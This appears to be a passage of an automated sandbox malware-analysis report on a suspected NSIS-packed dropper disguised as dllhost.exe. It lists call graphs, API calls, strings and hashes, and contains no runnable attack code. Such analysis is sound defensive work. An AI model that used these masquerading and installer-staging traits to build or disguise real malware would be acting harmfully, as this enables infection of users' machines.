calls 3919->3920 3921 4037c3 CloseHandle 3919->3921 3920->3919 3921->3919 3922->3846 3923->3848 3925 4064e0 5 API calls 3924->3925 3927 403318 3925->3927 3926 403322 3926->3854 3927->3926 3928 405b1d 3 API calls 3927->3928 3929 40332a 3928->3929 3930 4057fc 2 API calls 3929->3930 3931 403330 3930->3931 3932 405d6d 2 API calls 3931->3932 3933 40333b 3932->3933 3933->3854 4030 405d3e GetFileAttributesW CreateFileW 3934->4030 3936 402f01 3955 402f11 3936->3955 4031 40624c lstrcpynW 3936->4031 3938 402f27 3939 405b69 2 API calls 3938->3939 3940 402f2d 3939->3940 4032 40624c lstrcpynW 3940->4032 3942 402f38 GetFileSize 3943 403034 3942->3943 3961 402f4f 3942->3961 4033 402e5d 3943->4033 3945 40303d 3947 40306d GlobalAlloc 3945->3947 3945->3955 4045 4032f5 SetFilePointer 3945->4045 3946 4032df ReadFile 3946->3961 4044 4032f5 SetFilePointer 3947->4044 3949 4030a0 3952 402e5d 6 API calls 3949->3952 3951 403088 3954 4030fa 36 API calls 3951->3954 3952->3955 3953 403056 3956 4032df ReadFile 3953->3956 3959 403094 3954->3959 3955->3861 3957 403061 3956->3957 3957->3947 3957->3955 3958 402e5d 6 API calls 3958->3961 3959->3955 3959->3959 3960 4030d1 SetFilePointer 3959->3960 3960->3955 3961->3943 3961->3946 3961->3949 3961->3955 3961->3958 3963 406626 5 API calls 3962->3963 3964 40396e 3963->3964 3965 403974 3964->3965 3966 403986 3964->3966 4054 406193 wsprintfW 3965->4054 3967 40611a 3 API calls 3966->3967 3968 4039b6 3967->3968 3970 4039d5 lstrcatW 3968->3970 3972 40611a 3 API calls 3968->3972 3971 403984 3970->3971 4046 403c30 3971->4046 3972->3970 3975 405c25 18 API calls 3978 403a07 3975->3978 3976 403a9b 3977 405c25 18 API calls 3976->3977 3979 403aa1 3977->3979 3978->3976 3980 40611a 3 API calls 3978->3980 3982 403ab1 LoadImageW 3979->3982 3983 40626e 18 API calls 3979->3983 3981 403a39 3980->3981 3981->3976 3986 403a5a lstrlenW 3981->3986 3989 405b4a CharNextW 3981->3989 3984 403b57 3982->3984 3985 403ad8 RegisterClassW 3982->3985 3983->3982 3988 40140b 2 API calls 3984->3988 3987 403b0e SystemParametersInfoW CreateWindowExW 3985->3987 4017 403b61 3985->4017 3990 403a68 lstrcmpiW 3986->3990 3991 403a8e 3986->3991 3987->3984 3992 403b5d 3988->3992 3993 403a57 3989->3993 3990->3991 3994 403a78 GetFileAttributesW 3990->3994 3995 405b1d 3 API calls 3991->3995 3997 403c30 19 API calls 3992->3997 3992->4017 3993->3986 3996 403a84 3994->3996 3998 403a94 3995->3998 3996->3991 3999 405b69 2 API calls 3996->3999 4000 403b6e 3997->4000 4055 40624c lstrcpynW 3998->4055 3999->3991 4002 403b7a ShowWindow 4000->4002 4003 403bfd 4000->4003 4005 4065b6 3 API calls 4002->4005 4004 405383 5 API calls 4003->4004 4007 403c03 4004->4007 4006 403b92 4005->4006 4008 403ba0 GetClassInfoW 4006->4008 4011 4065b6 3 API calls 4006->4011 4009 403c07 4007->4009 4010 403c1f 4007->4010 4013 403bb4 GetClassInfoW RegisterClassW 4008->4013 4014 403bca DialogBoxParamW 4008->4014 4016 40140b 2 API calls 4009->4016 4009->4017 4012 40140b 2 API calls 4010->4012 4011->4008 4012->4017 4013->4014 4015 40140b 2 API calls 4014->4015 4015->4017 4016->4017 4017->3917 4018->3867 4019->3898 4020->3906 4022 403898 4021->4022 4023 40388a CloseHandle 4021->4023 4057 4038c5 4022->4057 4023->4022 4026 40595a 68 API calls 4027 4036b3 OleUninitialize 4026->4027 4027->3874 4027->3875 4028->3907 4029->3919 4030->3936 4031->3938 4032->3942 4034 402e66 4033->4034 4035 402e7e 4033->4035 4036 402e76 4034->4036 4037 402e6f DestroyWindow 4034->4037 4038 402e86 4035->4038 4039 402e8e GetTickCount 4035->4039 4036->3945 4037->4036 4040 406662 2 API calls 4038->4040 4041 402e9c CreateDialogParamW ShowWindow 4039->4041 4042 402ebf 4039->4042 4043 402e8c 4040->4043 4041->4042 4042->3945 4043->3945 4044->3951 4045->3953 4047 403c44 4046->4047 4056 406193 wsprintfW 4047->4056 4049 403cb5 4050 403ce9 19 API calls 4049->4050 4052 403cba 4050->4052 4051 4039e5 4051->3975 4052->4051 4053 40626e 18 API calls 4052->4053 4053->4052 4054->3971 4055->3976 4056->4049 4058 4038d3 4057->4058 4059 4038d8 FreeLibrary GlobalFree 4058->4059 4060 40389d 4058->4060 4059->4059 4059->4060 4060->4026 4760 40483d 4761 40484c 4760->4761 4791 4049eb 4761->4791 4793 405892 GetDlgItemTextW 4761->4793 4763 404248 8 API calls 4765 4049ff 4763->4765 4764 40486c 4766 405c25 18 API calls 4764->4766 4767 404872 4766->4767 4794 40624c lstrcpynW 4767->4794 4769 404889 4770 406626 5 API calls 4769->4770 4775 404890 4770->4775 4771 4048d1 4795 40624c lstrcpynW 4771->4795 4773 4048d8 4774 405bc8 4 API calls 4773->4774 4776 4048de GetDiskFreeSpaceW 4774->4776 4775->4771 4779 405b69 2 API calls 4775->4779 4780 404929 4775->4780 4778 404902 MulDiv 4776->4778 4776->4780 4778->4780 4779->4775 4781 40499a 4780->4781 4782 404b35 21 API calls 4780->4782 4783 4049bd 4781->4783 4785 40140b 2 API calls 4781->4785 4784 404987 4782->4784 4796 404203 KiUserCallbackDispatcher 4783->4796 4786 40499c SetDlgItemTextW 4784->4786 4787 40498c 4784->4787 4785->4783 4786->4781 4789 404a6c 21 API calls 4787->4789 4789->4781 4790 4049d9 4790->4791 4792 404609 SendMessageW 4790->4792 4791->4763 4792->4791 4793->4764 4794->4769 4795->4773 4796->4790

                                                                              Executed Functions

                                                                              Function 0040333D Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 8 403386 1->8 3 403392-4033a6 call 4065b6 lstrlenA 2->3 9 4033a8-4033c4 call 406626 * 3 3->9 8->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 22 4033ce 17->22 22->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 31 403468-40346d 28->31 32 40346f-403473 28->32 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 31->31 31->32 34 403475-403479 32->34 35 40347a-40347e 32->35 34->35 38 403484-40348a 35->38 39 40353d-40354a call 405b4a 35->39 57 403603-403609 36->57 58 4036ae-4036be call 403880 OleUninitialize 36->58 37->36 54 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->54 43 4034a5-4034de 38->43 44 40348c-403494 38->44 55 40354c-40354d 39->55 56 40354e-403554 39->56 47 4034e0-4034e5 43->47 48 4034fb-403535 43->48 45 403496-403499 44->45 46 40349b 44->46 45->43 45->46 46->43 47->48 52 4034e7-4034ef 47->52 48->39 53 403537-40353b 48->53 60 4034f1-4034f4 52->60 61 4034f6 52->61 53->39 62 40355c-40356a call 40624c 53->62 54->36 54->58 55->56 56->28 64 40355a 56->64 65 40369e-4036a5 call 40395a 57->65 66 40360f-40361a call 405b4a 57->66 75 4037e4-4037ea 58->75 76 4036c4-4036d4 call 4058ae ExitProcess 58->76 60->48 60->61 61->48 72 40356f 62->72 64->72 74 4036aa 65->74 77 403668-403672 66->77 78 40361c-403651 66->78 72->29 74->58 80 403868-403870 75->80 81 4037ec-403802 GetCurrentProcess OpenProcessToken 75->81 85 403674-403682 call 405c25 77->85 86 4036da-4036ee call 405819 lstrcatW 77->86 82 403653-403657 78->82 83 403872 80->83 84 403876-40387a ExitProcess 80->84 88 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403838-403846 call 406626 81->89 90 403660-403664 82->90 91 403659-40365e 82->91 83->84 85->58 101 403684-40369a call 40624c * 2 85->101 102 4036f0-4036f6 lstrcatW 86->102 103 4036fb-403715 lstrcatW lstrcmpiW 86->103 88->89 99 403854-40385f ExitWindowsEx 89->99 100 403848-403852 89->100 90->82 95 403666 90->95 91->90 91->95 95->77 99->80 104 403861-403863 call 40140b 99->104 100->99 100->104 101->65 102->103 103->58 106 403717-40371a 103->106 104->80 110 403723 call 4057fc 106->110 111 40371c-403721 call 40577f 106->111 116 403728-403736 SetCurrentDirectoryW 110->116 111->116 118 403743-40376c call 40624c 116->118 119 403738-40373e call 40624c 116->119 123 403771-40378d call 40626e DeleteFileW 118->123 119->118 126 4037ce-4037d6 123->126 127 40378f-40379f CopyFileW 123->127 126->123 128 4037d8-4037df call 406012 126->128 127->126 129 4037a1-4037c1 call 406012 call 40626e call 405831 127->129 128->58 129->126 138 4037c3-4037ca CloseHandle 129->138 138->126
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE ref: 00403360
                                                                              • GetVersion.KERNEL32 ref: 00403366
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                                              • OleInitialize.OLE32(00000000), ref: 004033DD
                                                                              • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                                              • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                                              • CharNextW.USER32(00000000), ref: 00403448
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403582
                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004035B3
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                                                              • DeleteFileW.KERNEL32(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                                              • ExitProcess.KERNEL32 ref: 004036D4
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                                                              • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                                              • CopyFileW.KERNEL32 ref: 00403797
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004037C4
                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                                              • ExitProcess.KERNEL32 ref: 0040387A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\dllhost.exe$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                              • API String ID: 2488574733-2881799354
                                                                              • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                                              • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                                              • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                                              • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                                                              Function 004053EF Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284windowclipboardmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 159 4054f5-4054f8 140->159 160 4054d9-4054f3 SendMessageW * 2 140->160 143 4055a2-4055c4 GetDlgItem CreateThread CloseHandle 141->143 144 4055ca-4055d7 141->144 143->144 145 4055f5-4055ff 144->145 146 4055d9-4055df 144->146 150 405601-405607 145->150 151 405655-405659 145->151 148 4055e1-4055f0 ShowWindow * 2 call 404216 146->148 149 40561a-405623 call 404248 146->149 148->145 163 405628-40562c 149->163 155 405609-405615 call 4041ba 150->155 156 40562f-40563f ShowWindow 150->156 151->149 153 40565b-405661 151->153 153->149 161 405663-405676 SendMessageW 153->161 155->149 164 405641-40564a call 4052b0 156->164 165 40564f-405650 call 4041ba 156->165 166 405508-40551f call 4041e1 159->166 167 4054fa-405506 SendMessageW 159->167 160->159 168 405778-40577a 161->168 169 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 161->169 164->165 165->151 178 405521-405535 ShowWindow 166->178 179 405555-405576 GetDlgItem SendMessageW 166->179 167->166 168->163 176 4056a9-4056b9 GetWindowRect 169->176 177 4056bc-4056d1 TrackPopupMenu 169->177 176->177 177->168 180 4056d7-4056ee 177->180 181 405544 178->181 182 405537-405542 ShowWindow 178->182 179->168 183 40557c-405594 SendMessageW * 2 179->183 184 4056f3-40570e SendMessageW 180->184 185 40554a-405550 call 404216 181->185 182->185 183->168 184->184 186 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                                                              • GetClientRect.USER32(?,?,00000004), ref: 00405499
                                                                              • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                                              • ShowWindow.USER32(00000000,?), ref: 00405528
                                                                              • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                                                                • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                                                              • ShowWindow.USER32(00000000), ref: 004055E8
                                                                              • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                                              • ShowWindow.USER32(00000008), ref: 00405637
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                                              • CreatePopupMenu.USER32 ref: 0040567C
                                                                              • AppendMenuW.USER32 ref: 00405690
                                                                              • GetWindowRect.USER32(?,?), ref: 004056B0
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                                              • OpenClipboard.USER32(00000000), ref: 00405711
                                                                              • EmptyClipboard.USER32 ref: 00405717
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                                                              • CloseClipboard.USER32 ref: 00405772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: ,UZ${$6B
                                                                              • API String ID: 590372296-1676891917
                                                                              • Opcode ID: 603f1e5836f016c9ef8918a926ca3e4a3ff6a637239844c800b68a1693d992f1
                                                                              • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                                              • Opcode Fuzzy Hash: 603f1e5836f016c9ef8918a926ca3e4a3ff6a637239844c800b68a1693d992f1
                                                                              • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                                                              Function 0040595A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 498 40595a-405980 call 405c25 501 405982-405994 DeleteFileW 498->501 502 405999-4059a0 498->502 503 405b16-405b1a 501->503 504 4059a2-4059a4 502->504 505 4059b3-4059c3 call 40624c 502->505 506 405ac4-405ac9 504->506 507 4059aa-4059ad 504->507 513 4059d2-4059d3 call 405b69 505->513 514 4059c5-4059d0 lstrcatW 505->514 506->503 509 405acb-405ace 506->509 507->505 507->506 511 405ad0-405ad6 509->511 512 405ad8-405ae0 call 40658f 509->512 511->503 512->503 522 405ae2-405af6 call 405b1d call 405912 512->522 515 4059d8-4059dc 513->515 514->515 518 4059e8-4059ee lstrcatW 515->518 519 4059de-4059e6 515->519 521 4059f3-405a0f lstrlenW FindFirstFileW 518->521 519->518 519->521 523 405a15-405a1d 521->523 524 405ab9-405abd 521->524 538 405af8-405afb 522->538 539 405b0e-405b11 call 4052b0 522->539 527 405a3d-405a51 call 40624c 523->527 528 405a1f-405a27 523->528 524->506 526 405abf 524->526 526->506 540 405a53-405a5b 527->540 541 405a68-405a73 call 405912 527->541 530 405a29-405a31 528->530 531 405a9c-405aac FindNextFileW 528->531 530->527 534 405a33-405a3b 530->534 531->523 537 405ab2-405ab3 FindClose 531->537 534->527 534->531 537->524 538->511 544 405afd-405b0c call 4052b0 call 406012 538->544 539->503 540->531 545 405a5d-405a66 call 40595a 540->545 550 405a94-405a97 call 4052b0 541->550 551 405a75-405a78 541->551 544->503 545->531 550->531 554 405a7a-405a8a call 4052b0 call 406012 551->554 555 405a8c-405a92 551->555 554->531 555->531
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405983
                                                                              • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059CB
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059EE
                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059F4
                                                                              • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405A04
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                                              • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                                              Strings
                                                                              • "C:\Users\user\AppData\Roaming\dllhost.exe" , xrefs: 0040595A
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                                                              • \*.*, xrefs: 004059C5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-201830484
                                                                              • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                                              • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                                              • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                                              • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                                              Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
